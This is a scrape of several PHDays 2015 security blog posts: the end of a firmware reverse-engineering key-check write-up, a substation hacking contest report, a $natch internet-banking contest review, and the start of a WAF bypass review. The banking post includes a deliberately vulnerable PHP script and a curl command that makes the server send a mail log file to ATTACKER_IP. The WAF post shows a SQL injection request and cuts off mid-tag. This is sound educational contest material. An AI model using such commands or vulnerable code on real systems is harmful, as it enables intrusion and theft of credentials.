class="hps">The function</span> <span class="hps">0x22E0</span> <span class="hps">is not called</span>, but it contains <span class="hps">a lot of code</span>. <span class="hps">We can assume that</span> <span class="hps">is the entry point</span> <span class="hps">of the program</span>, the <span class="hps">start</span> function<span class="hps">.</span></span><span lang="EN-US"><o:p></o:p></span></span></div><div class="MsoNormal"><span lang="EN"><span class="hps"><span style="font-family: inherit;"><br /></span></span></span></div><div class="MsoNormal"><span lang="EN"><span style="font-family: inherit;"> </span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span class="hps"><span lang="EN-US">In t</span></span><span class="hps"><span lang="EN">he third</span></span><span lang="EN"> <span class="hps">instruction</span> <span class="hps">of the start function,</span> an <span class="hps">unknown</span> <span class="hps">library function</span> <span class="hps">with one argument</span> <span class="hps">== 0x126F0 is called,</span><span class="hps">and</span> <span class="hps">the same function</span> <span class="hps">is called from the start</span> function <span class="hps">four more times</span>, <span class="hps">always</span> <span class="hps">with arguments with similar</span> values <span class="hps">(0x12718, 0x12738, 0x12758, 0x12760).</span><span class="hps">And in the</span> <span class="hps">middle of the program</span>, starting from <span class="hps">0x2490,</span> <span class="hps">there are</span> five <span class="hps">lines with text</span> <span class="hps">messages</span>:</span></span><span lang="EN-US"><o:p></o:p></span></div><div class="MsoNormal"><span lang="EN"><br /></span></div><div class="MsoNormal"><span lang="EN-US">00002490 .ascii "Firmware loaded, sending ok back."<0><o:p></o:p></span></div><div class="MsoNormal"><span lang="EN-US">000024B8 .ascii "Failed to retrieve email."<0><o:p></o:p></span></div><div class="MsoNormal"><span lang="EN-US">000024D8 .ascii "Failed to retrieve codes."<0><o:p></o:p></span></div><div class="MsoNormal"><span lang="EN-US">000024F8 .ascii "Gratz!"<0><o:p></o:p></span></div><div class="MsoNormal"><span lang="EN-US">00002500 .ascii "Sorry may be next time..."<0><o:p></o:p></span></div><div class="MsoNormal"><span lang="EN-US"><br /></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span class="hps"><span lang="EN">Assuming that</span></span><span lang="EN"> <span class="hps">the load address</span> <span class="hps">equals</span> <span class="hps">0x126F0-0x2490 == 0x10260,</span> <span class="hps">then all</span> <span class="hps">the arguments</span> <span class="hps">will</span> <span class="hps">indicate the</span><span class="hps">lines when calling</span> <span class="hps">the library</span> <span class="hps">function</span>, and the unknown<span class="hps"> function turns out to be the</span> <span class="hps">printf function (</span>or <span class="hps">puts)</span>.</span><span lang="EN-US"><o:p></o:p></span></span></div><div class="MsoNormal"><span lang="EN"><span style="font-family: inherit;"><br /></span></span></div><div class="MsoNormal"><span lang="EN"><span style="font-family: inherit;"> </span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span class="hps"><span lang="EN">After changing the</span></span><span lang="EN"> <span class="hps">load</span> <span class="hps">base,</span> the <span class="hps">code will</span> <span class="hps">look something like this</span>:</span></span><span lang="EN-US"><o:p></o:p></span></div><div class="MsoNormal"><span lang="EN"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-KDaOh5Ma1UU/VZJKCptoydI/AAAAAAAAFHw/h1vJkeI07yY/s1600/new29-064.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="382" src="http://1.bp.blogspot.com/-KDaOh5Ma1UU/VZJKCptoydI/AAAAAAAAFHw/h1vJkeI07yY/s640/new29-064.png" width="640" /></a></div><div class="MsoNormal"><span lang="EN"><br /></span></div><div class="MsoNormal"><span lang="EN"><br /></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span class="hps"><span lang="EN">The value of</span></span><span lang="EN"> <span class="hps">0x0BA0BAB0,</span> <span class="hps">transmitted to the</span> <span class="hps">function</span> <span class="hps">sub_12194,</span> can be <span class="hps">found in</span> <span class="hps">the first part of</span> <span class="hps">the task</span>, <span class="hps">in the function</span> <span class="hps">fire_second_proc,</span> <span class="hps">and is compared with</span> <span class="hps">what we obtain from</span> <span class="hps">read_pipe_u32 ().</span> <span class="hps">Thus</span> sub_12194 <span class="hps">should be called</span> <span class="hps">write_pipe_u32.</span></span><span lang="EN-US"><o:p></o:p></span></span></div><div class="MsoNormal"><span lang="EN"><span class="hps"><span style="font-family: inherit;"><br /></span></span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span class="hps"><span lang="EN">Similarly,</span></span><span lang="EN"> <span class="hps">two</span> calls of the <span class="hps">library function</span> <span class="hps">sub_24064 are memset (someVar,</span> <span class="hps">0</span>, 0x101) <span class="hps">for</span>the <span class="hps">email</span> <span class="hps">and</span> <span class="hps">code, while</span> <span class="hps">sub_121BC is</span> <span class="hps">read_pipe_str (),</span> <span class="hps">reversed</span> <span class="hps">write_pipe_str ()</span><span class="hps">from the first part</span>.</span><span lang="EN-US"><o:p></o:p></span></span></div><div class="MsoNormal"><span lang="EN"><span style="font-family: inherit;"><br /></span></span></div><div class="MsoNormal"><span lang="EN"><span style="font-family: inherit;"> </span></span></div><div class="MsoNormal"><span class="hps"><span lang="EN"><span style="font-family: inherit;">The first</span></span></span><span lang="EN"><span style="font-family: inherit;"> <span class="hps">function (</span>at offset <span class="hps">0</span> or <span class="hps">address</span> <span class="hps">0x10260)</span> <span class="hps">has typical</span> <span class="hps">constants of</span> <span class="hps">MD5_Init:</span></span><o:p></o:p></span></div><div class="MsoNormal"><span lang="EN"><span style="font-family: inherit;"><span class="hps"><br /></span></span></span></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-IiVLskRmxDI/VZJKCzgy-jI/AAAAAAAAFIE/q9ksxn_8agA/s1600/new29-065.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="640" src="http://2.bp.blogspot.com/-IiVLskRmxDI/VZJKCzgy-jI/AAAAAAAAFIE/q9ksxn_8agA/s640/new29-065.png" width="603" /></a></div><div class="MsoNormal"><span lang="EN"><span class="hps"><br /></span></span></div><div class="MsoNormal"><span lang="EN"><span class="hps"><br /></span></span></div><div class="MsoNormal"><span lang="EN"><span class="hps"></span></span></div><div class="MsoNormal"><span lang="EN"><span class="hps"><span lang="EN"> Next to</span></span><span lang="EN"> <span class="hps">the call to</span> </span><span style="font-family: inherit;"><span class="hps">MD5_Init,</span> <span class="hps">it</span> <span class="hps">is easy to detect</span> the <span class="hps">function</span> <span class="hps">MD5_Update ()</span> <span class="hps">and</span> <span class="hps">MD5_Final (),</span> <span class="hps">preceded by the</span> <span class="hps">call to</span><span class="hps">the library</span> <span class="hps">strlen ().</span></span></span><span lang="EN-US"><o:p></o:p></span></div><div class="MsoNormal"><span lang="EN"><span class="hps"><br /></span></span></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-OzZ-jPt3iHk/VZJKDFBjIQI/AAAAAAAAFH0/VGgPLhMIXdE/s1600/new29-066.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="448" src="http://3.bp.blogspot.com/-OzZ-jPt3iHk/VZJKDFBjIQI/AAAAAAAAFH0/VGgPLhMIXdE/s640/new29-066.png" width="640" /></a></div><div class="MsoNormal"><span lang="EN"><span class="hps"><br /></span></span></div><div class="MsoNormal"><span lang="EN"><span class="hps"><br /></span></span></div><div class="MsoNormal"><span lang="EN"><span class="hps"></span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span class="hps"><span lang="EN">Not too many unknown functions are left in the</span></span><span lang="EN"> <span class="hps">start() function.</span></span></span><span lang="EN-US"><o:p></o:p></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span lang="EN"><span class="hps"><br /></span></span></span></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-71h-XCcazKE/VZJKDuuLlkI/AAAAAAAAFH8/oBfQPCSp2CM/s1600/new29-067.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="616" src="http://1.bp.blogspot.com/-71h-XCcazKE/VZJKDuuLlkI/AAAAAAAAFH8/oBfQPCSp2CM/s640/new29-067.png" width="640" /></a></div><div class="MsoNormal"><span lang="EN"><span class="hps"><br /></span></span></div><div class="MsoNormal"><span lang="EN"><span class="hps"><br /></span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span class="hps"><span lang="EN">The sub_12480</span></span><span lang="EN"> <span class="hps">function</span> <span class="hps">reverses</span> <span class="hps">the byte array</span> of <span class="hps">specified length</span>. <span class="hps">In fact, it’s</span> <span class="hps">memrev,</span> <span class="hps">which</span> <span class="hps">receives </span>a <span class="hps">code array input</span> <span class="hps">of 16</span> <span class="hps">bytes.</span></span><span lang="EN-US"><o:p></o:p></span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span lang="EN"><span class="hps"><br /></span></span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span class="hps"><span lang="EN">Obviously, the</span></span><span lang="EN"> <span class="hps">sub_24040</span>function <span class="hps">checks whether the</span> <span class="hps">code</span> <span class="hps">is correct</span>. <span class="hps">The</span> <span class="hps">arguments</span><span class="hps">transfer the calculated value of</span> <span class="hps">MD5(email),</span><span class="hps">the array</span> <span class="hps">filled in</span> <span class="hps">function</span> <span class="hps">sub_12394,</span> <span class="hps">and the number</span> <span class="hps">16.</span> <span class="hps">It</span> <span class="hps">could be</span> <span class="hps">a</span> <span class="hps">call to</span><span class="hps">memcmp!</span></span><span lang="EN-US"><o:p></o:p></span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span lang="EN"><span class="hps"><br /></span></span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span class="hps"><span lang="EN">The</span></span><span lang="EN"> <span class="hps">real trick</span> <span class="hps">is happening in</span> <span class="hps">sub_12394.</span> <span class="hps">There is almost</span> <span class="hps">no</span> <span class="hps">hints</span><span class="hps">there, but</span> <span class="hps">the algorithm</span> <span class="hps">is described</span> <span class="hps">by one phrase—the multiplication of</span> <span class="hps">binary matrix</span> <span class="hps">of the 128 by the binary vector of</span> <span class="hps">128. The matrix is stored</span> <span class="hps">in the firmware</span> <span class="hps">at</span> <span class="hps">0x240B8.</span></span><span lang="EN-US"><o:p></o:p></span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span lang="EN"><span class="hps"><br /></span></span></span></div><div class="MsoNormal"><span lang="EN"><span style="font-family: inherit;"> </span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span class="hps"><span lang="EN">Thus,</span></span><span lang="EN"> <span class="hps">the code</span> <span class="hps">is correct</span> <span class="hps">if MD5(email) == matrix_mul_vector (matrix, code).</span></span><span lang="EN-US"><o:p></o:p></span></span></div><div class="MsoNormal"><span lang="EN"><br /></span></div><div class="MsoNormal"><span lang="EN"><br /></span></div><h3 style="text-align: left;"><span style="font-size: large;">Calculating the Key</span></h3><div class="MsoNormal"><span style="font-family: inherit;"><span class="hps"><span lang="EN">To find the correct</span></span><span lang="EN"> <span class="hps">value of the</span> <span class="hps">code,</span> <span class="hps">you need to</span> <span class="hps">solve a system of</span> <span class="hps">binary</span><span class="hps">equations described by the</span> <span class="hps">matrix</span>, where the <span class="hps">right-hand side</span> <span class="hps">are</span> <span class="hps">the relevant bits</span> <span class="hps">of the</span> <span class="hps">MD5(email).</span> <span class="hps">If</span> <span class="hps">you forgot linear algebra</span>: <span class="hps">this is easily solved</span></span><span class="hps"><span lang="EN"> </span></span><span class="hps"><span lang="EN">by Gaussian elimination</span></span><span class="hps"><span lang="EN-US">.</span></span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span class="hps"><span lang="EN-US"><br /></span></span></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-family: inherit;"><span class="hps"><span lang="EN">If </span></span><span lang="EN">the <span class="hps">right-hand side of the key is known (32 hexadecimal characters), we can try to guess the first seven characters so that the CRC32 calculation result was equal to the value found for the key BTEA. There are about 1024 of such values, and they can be quickly obtained by brute-force, or by converting CRC32 and checking valid characters.<o:p></o:p></span></span></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><br /></div><div class="MsoNormal"><span style="font-family: inherit;"><span class="hps"><span lang="EN">Now you need to put everything together</span></span><span lang="EN"> <span class="hps">and get</span> <span class="hps">the key that</span> will <span class="hps">pass all the</span> <span class="hps">checks and</span> <span class="hps">will be recognized</span> <span class="hps">as valid</span>by <span class="hps">our</span> <span class="hps">verifier</span> <span class="hps">:)<o:p></o:p></span></span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span class="hps"><span lang="EN">We were afraid that</span></span><span lang="EN"> <span class="hps">no one</span> <span class="hps">would be able</span> <span class="hps">to solve the task</span> <span class="hps">from the beginning to</span> the <span class="hps">end.</span> <span class="hps">Fortunately</span>, Victor <span class="hps">Alyushin</span> <span class="hps">showed that</span> <span class="hps">our fears</span> <span class="hps">were</span> <span class="hps">groundless</span>. <span class="hps">You can find his write-up on the task at </span></span><a href="http://nightsite.info/blog/16542-phdays-2015-best-reverser.html"><span lang="EN-US">http://nightsite.info/blog/16542-phdays-2015-best-reverser.html</span></a><span lang="EN-US">. This is the second time </span><span lang="EN">Victor <span class="hps">Alyushin has won the contest</span></span><span lang="EN-US"> (he was the winner in </span><a href="http://blog.ptsecurity.com/2013/06/best-reverser-at-phdays-iii-developers.html"><span lang="EN-US">2013</span></a><span lang="EN-US"> as well).<o:p></o:p></span></span></div><div class="MsoNormal"><span style="font-family: inherit;"><span lang="EN-US"><br /></span></span></div><div class="MsoNormal"><span lang="EN-US"><span style="font-family: inherit;">A participant who wished to remain anonymous solved a part of the task and took second place. <o:p></o:p></span></span></div><div class="MsoNormal"><span lang="EN-US"><span style="font-family: inherit;"><br /></span></span></div><div class="MsoNormal"><span lang="EN"><span style="font-family: inherit;"> </span></span></div><div class="MsoNormal"><span lang="EN-US"><span style="font-family: inherit;">Thanks to all participants!</span><o:p></o:p></span></div><div class="MsoNormal"><br /></div></div>Unknownnoreply@blogger.com1042tag:blogger.com,1999:blog-5176771794789502609.post-75448220854405434722015-06-11T15:34:00.001+03:002015-06-11T15:34:55.706+03:00Digital Substation Takeover: Contest Overview<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-ct0Hn2JXurs/VXl-gXF6vjI/AAAAAAAAFDQ/rQZZUaXxdQ4/s1600/Digital-Substation-Takeover-%25D0%25BD%25D0%25B0-PHDays-1024x587.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="366" src="http://4.bp.blogspot.com/-ct0Hn2JXurs/VXl-gXF6vjI/AAAAAAAAFDQ/rQZZUaXxdQ4/s640/Digital-Substation-Takeover-%25D0%25BD%25D0%25B0-PHDays-1024x587.jpg" width="640" /></a></div><br />Digital Substation Takeover, presented by <a href="http://igrids.ru/">iGRIDS</a>, was held at PHDays V. The contest's participants tried themselves in hacking a real electrical substation designed according to IEC 61850. The general task was to perform a successful attack against the electrical equipment control system.<br /><a name='more'></a><br /><b><span style="font-size: large;">What it's all about</span></b><br /><br />A special high voltage (500 kV) substation model had been developed for the contest. It included switches, time servers, protective relays that are used in modern high voltage electric networks to ensure protection in emergency situations and incidents (in case of a short circuit, faults in a power transmission line etc.).<br /><br />Several scenarios were offered, each of them corresponding to unauthorized access to switches: circuit breaker opening, earthing switch closing despite operation blocking. The contest's organizers suggested that the most difficult task—that is to cause an emergency on the site—would be followed by fireworks of burning wires of the model overhead power line set nearby.<br /><br /><iframe allowfullscreen="" frameborder="0" height="270" src="https://www.youtube.com/embed/w8T-bbO3Qec" width="480"></iframe> <br />This year's format combined various competitions with capture the flag contests. CTF teams along with the rest of the forum's participants were able to take part in them (see our article on <a href="http://blog.phdays.com/2015/05/making-money-on-cyberwar.html">our blog</a>). About 50 PHDays attendees and several CTF teams took part in Digital Substation Takeover.<br /><br /><b><span style="font-size: large;">Technical details</span></b><br /><br />The model used the following equipment:<br /><br /><ul style="text-align: left;"><li>Siemens SICAM PAS v. 7.0,</li><li>common protective relays and switches,</li><li>GPS and GLONASS time servers,</li><li>industrial switches.</li></ul><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-Xiw_HNY6gqQ/VXl_Fwr-_YI/AAAAAAAAFDY/gP1sm_iaYsk/s1600/Sohranennoe-izobrazhenie-2015-5-15_11-50-27.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="252" src="http://1.bp.blogspot.com/-Xiw_HNY6gqQ/VXl_Fwr-_YI/AAAAAAAAFDY/gP1sm_iaYsk/s640/Sohranennoe-izobrazhenie-2015-5-15_11-50-27.jpg" width="640" /></a></div><div><br /></div><div><b><span style="font-size: large;">The course of the contest</span></b></div><br /><br />Since the contest was held for the first time at PHDays and due to its specific nature, participants spent the first day studying power-system protection, switches, and operation blocking. They had to analyze large amounts of information found on special forums, vendors' sites etc.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-pT27E0ecgh8/VXl_VQ3VTPI/AAAAAAAAFDg/zgqZ2TxwWrw/s1600/IMG_2040-580x435.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="http://2.bp.blogspot.com/-pT27E0ecgh8/VXl_VQ3VTPI/AAAAAAAAFDg/zgqZ2TxwWrw/s640/IMG_2040-580x435.jpg" width="640" /></a></div><br />The contest comprised several tasks of different difficulty levels:<br /><br /><ul style="text-align: left;"><li>temporal destruction to the substation's information infrastructure (was performed six times);</li><li>time server reprogramming (was performed once);</li><li>unauthorized disconnection of consumers (twice);</li><li>detecting an unknown vulnerability (once).</li></ul><br />The most difficult task was to take control over primary devices and issue a command bypassing blocking. No one managed to solve this task (though one team got quite close).<br /><br />Sergey Sidorov took first place, Alexander Kalinin came second. RDot and ReallyNonamesFor gained some points for hacking the substation.<br /><br /><b><span style="font-size: large;">Not quite at ease</span></b><br /><br />During the contest, representatives of power supply companies, such as the Federal Grid Company of Unified Energy System (FGC UES), were watching the process closely.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-d0AwzXDSt9U/VXl_yrwSw1I/AAAAAAAAFDo/e2lTXkQqs0s/s1600/Seleznev-170x170.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-d0AwzXDSt9U/VXl_yrwSw1I/AAAAAAAAFDo/e2lTXkQqs0s/s1600/Seleznev-170x170.jpg" /></a></div>"To tell the truth, when I saw those people lounging in beanbags and hacking industrial control and protection systems for some virtual profit, I felt uncomfortable," said Mikhail Seleznev in an interview [ru] with Digital Substation, an online magazine. Mikhail is the head of the ICS and metrology division of the relay protection department at FGC UES. "No one can guarantee that a group of such creative individuals won't gather together and use the knowledge their obtained during this contest to crack real infrastructure—just for the fun of it. Are they aware of the weight of possible consequences of such actions?"<br /><br />However, Mikhail doubts that it's IEC 61850 that should undergo any changes: "The standard should continue to develop for the benefit of the purposes it was designed for. Information security should be the subject of other standards. There has been much talk about ICS protection recently. In fact, it is important to engage representatives of power supply companies in such discussions—and in putting new methods into practice."<br /><br />iGRIDS, the organizers of the contest, registered everything that occurred on the stand. By the middle of the contest, it became obvious that the range of threats was broader than they had expected. The developers assure that they will take into account new attack variations when developing subsequent versions of protection systems. And they’ve already got an invitation to take part in PHDays VI!</div>Unknownnoreply@blogger.com287tag:blogger.com,1999:blog-5176771794789502609.post-49298138737211880562015-06-05T17:44:00.000+03:002015-06-05T17:44:18.390+03:00How They Hacked Internet Banking at PHDays V<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-uMcrwJt-4y8/VXG0-Lj5KbI/AAAAAAAAFCo/_I8Z5TCbw3o/s1600/snatch1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="432" src="http://3.bp.blogspot.com/-uMcrwJt-4y8/VXG0-Lj5KbI/AAAAAAAAFCo/_I8Z5TCbw3o/s640/snatch1.png" width="640" /></a></div><br />During Positive Hack Days V, which was held on May 26 and 27 in Moscow, the <a href="http://www.phdays.com/program/contests/#16296" target="_blank">$natch</a> competition was organized again. It consisted of two rounds. First, the contest's participants were provided with virtual machine copies that contained vulnerable web services of an internet banking system (an analog of a real system). After that, they had to analyze the banking system image and try to transfer money from the bank to their own accounts by exploiting security defects they had detected.<br /><a name='more'></a><br />This year's format combined various competitions with CTF (see <a href="http://blog.phdays.com/2015/05/making-money-on-cyberwar.html" target="_blank">our blog</a>), and CTF teams were able to take part in them along with the rest of the forum's attendees. Thirty people participated in $natch. The prize money was ramped up to 40,000 rubles (<a href="http://blog.phdays.com/2014/05/the-natch-contest-is-over.html" target="_blank">last year</a> it was 20,000).<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-W9yMnwV0C84/VXG1OhbjrOI/AAAAAAAAFCw/bO7OkqiuZ4I/s1600/snatch2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="310" src="http://3.bp.blogspot.com/-W9yMnwV0C84/VXG1OhbjrOI/AAAAAAAAFCw/bO7OkqiuZ4I/s640/snatch2.png" width="640" /></a></div><br /><b><span style="font-size: large;">Technical details</span></b><br /><br />PHDays iBank was developed especially for the contest. It contained vulnerabilities that occur in real banking systems. The system was divided into frontend and backend that provided a simple RESTful API, which is why participants needed to study the communication protocol that supports different components of the internet banking system.<br /><br />A typical i-banking system contains logical vulnerabilities (related to weak validation, which causes data leakage) rather than crude security lapses that allow malicious code injection and execution. The contest's banking system mainly contained the former.<br />PHDays iBank offered 10 banking accounts with seven vulnerability combinations (the more sophisticated the vulnerability is, the more money there was in an account).<br /><br />Participants could perform such attacks as:<br /><br /><ul style="text-align: left;"><li>brute-force using a list of most common passwords available on the web;</li><li>hack accounts via bypassing their two-factor authentication;</li><li>exploit vulnerabilities in password-reset algorithms;</li><li>experiment with the test script that was used to control API backend performance (validation bypassing, arbitrary file reading);</li><li>bypass postponed payment protection mechanism (the attack allowed stealing money from other contestants' accounts).</li></ul><br /><b><span style="font-size: large;">Examples of vulnerabilities</span></b><br /><br />The test script included the following code:<br /><br /><span style="font-family: Courier New, Courier, monospace;"><?php</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">if ($_SERVER['HTTP_HOST'] != 'ibank.dev') {</span><br /><span style="font-family: Courier New, Courier, monospace;"> exit;</span><br /><span style="font-family: Courier New, Courier, monospace;">}</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">if (empty($_GET['url'])) {</span><br /><span style="font-family: Courier New, Courier, monospace;"> exit;</span><br /><span style="font-family: Courier New, Courier, monospace;">}</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">$parts = parse_url($_GET['url']);</span><br /><span style="font-family: Courier New, Courier, monospace;">$port = empty($parts['port']) ? '' : ':' . $parts['port'];</span><br /><span style="font-family: Courier New, Courier, monospace;">$url = "http://{$parts['host']}$port/status";</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">$ch = curl_init();</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">curl_setopt_array($ch, [</span><br /><span style="font-family: Courier New, Courier, monospace;">// CURLOPT_URL => $_GET['url'],</span><br /><span style="font-family: Courier New, Courier, monospace;"> CURLOPT_URL => $url,</span><br /><span style="font-family: Courier New, Courier, monospace;"> CURLOPT_HEADER => false,</span><br /><span style="font-family: Courier New, Courier, monospace;"> CURLOPT_RETURNTRANSFER => true,</span><br /><span style="font-family: Courier New, Courier, monospace;">]);</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">if (!empty($_GET['params'])) {</span><br /><span style="font-family: Courier New, Courier, monospace;"> curl_setopt_array($ch, [</span><br /><span style="font-family: Courier New, Courier, monospace;"> CURLOPT_POST => true,</span><br /><span style="font-family: Courier New, Courier, monospace;"> CURLOPT_POSTFIELDS => $_GET['params']</span><br /><span style="font-family: Courier New, Courier, monospace;"> ]);</span><br /><span style="font-family: Courier New, Courier, monospace;">}</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">var_dump(curl_exec($ch));</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">curl_close($ch);</span><br /><br />It was possible to bypass hostname validation. Due to the possibility of file transfer and by using @ in the parameter value, the following attack could be performed:<br /><br /><span style="font-family: Courier New, Courier, monospace;">curl -H 'Host: ibank.dev' 'http://SERVER_IP/api_test.php?url=http://ATTACKER_IP/&params\[a\]=@ /var/www/frontend/data/logs/mail.log'</span><br /><br />Upon obtaining access to the log file of sent messages, the participant could find passwords to accounts that used password recovery system.<br /><br />To bypass two-factor authentication, participants used a vulnerability that featured in an article on <a href="http://sakurity.com/blog/2015/03/15/authy_bypass.html">Sakurity.com</a>.During the contest, it turned out that not all the participants were aware of that vulnerability, some of them were checking all possible values as in the old times.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-67yOEzY3WaY/VXG1iRTxqyI/AAAAAAAAFC4/eDMBotX1cks/s1600/snatch3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="324" src="http://2.bp.blogspot.com/-67yOEzY3WaY/VXG1iRTxqyI/AAAAAAAAFC4/eDMBotX1cks/s640/snatch3.png" width="640" /></a></div><br /><b><span style="font-size: large;">The battle</span></b><br /><br />Apart from attacking the internet banking system, participants could steal money from other contestants' accounts. More Smoked Leet Chicken chose this method and won the contest, making 15,000 rubles. Stas Povolotsky, who took second place, managed to steal 3,200 rubles from the contest's bank.<br /><br />It's worth mentioning that RDot detected and exploited the most number of vulnerabilities. However, the team failed to protect the earned money, and More Smoked Leet Chicken took the advantage and stole the money from RDot's account.<br /><br />Final scoreboard<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-IIaNcn8H-Rs/VXG1pgOhG0I/AAAAAAAAFDA/4wvWyE-JQZI/s1600/snatch4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="310" src="http://2.bp.blogspot.com/-IIaNcn8H-Rs/VXG1pgOhG0I/AAAAAAAAFDA/4wvWyE-JQZI/s640/snatch4.png" width="640" /></a></div><br />Congratulations to the winners!<br /><br /></div>Unknownnoreply@blogger.com242tag:blogger.com,1999:blog-5176771794789502609.post-67593903891294090292015-06-03T17:42:00.000+03:002015-06-03T17:42:03.703+03:00WAF Bypass at Positive Hack Days V<div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-V1-QFPPGglM/VW8OGj5ucqI/AAAAAAAAFA0/6k5zyU4bUrQ/s1600/waf1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="http://3.bp.blogspot.com/-V1-QFPPGglM/VW8OGj5ucqI/AAAAAAAAFA0/6k5zyU4bUrQ/s640/waf1.jpg" width="640" /></a></div><br />As it <a href="http://blog.phdays.com/2014/07/review-of-waf-bypass-tasks.html">did last year</a>, the PHDays forum on information security hosted WAF Bypass this year as well. The contest's participants tried to bypass the protection of <a href="http://www.ptsecurity.com/products/af/">PT Application Firewall</a>, Positive Technologies' product. For this contest, the organizers developed the site Choo Roads, which contained common vulnerabilities, such as Cross-Site Scripting, SQL Injection, XML External Entities Injection, Open Redirect. Upon exploiting one of the vulnerabilities, a participant obtained a flag in the MD5 format and gained points. MD5 flags could be found in the file system, database, and cookie parameters and detected by a special bot that was developed by using Selenium.<br /><a name='more'></a><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-0oEaGNwh6rc/VW8OblbLfeI/AAAAAAAAFA8/uRMhgGSpPf8/s1600/waf2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="392" src="http://1.bp.blogspot.com/-0oEaGNwh6rc/VW8OblbLfeI/AAAAAAAAFA8/uRMhgGSpPf8/s640/waf2.png" width="640" /></a></div>Though the contest WAF configuration allowed bypassing, uncommon solutions were also presented. This was actually the goal of the contest: participants had the opportunity to try themselves in bypassing protection mechanisms, while we can improve our product due to the results. Let's have a look at those vulnerabilities and bypass techniques.<br /><br /><b><span style="font-size: large;">Warmup</span></b><br /><br />The vulnerability was in the script that tracked user activity on the site.<br /><br /><span style="font-family: Courier New, Courier, monospace;">POST /online.php HTTP/1.1</span><br /><span style="font-family: Courier New, Courier, monospace;">Host: choo-choo.phdays.com</span><br /><span style="font-family: Courier New, Courier, monospace;">Connection: keep-alive</span><br /><span style="font-family: Courier New, Courier, monospace;">Content-Length: 24</span><br /><span style="font-family: Courier New, Courier, monospace;">Content-Type: application/json</span><br /><span style="font-family: Courier New, Courier, monospace;">User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">{"timestamp":1432906707}</span><br /><br />Timestamp field values from the JSON data in the POST request were not validated before using them in the SQL request:<br /><div class="separator" style="clear: both; text-align: center;"><a 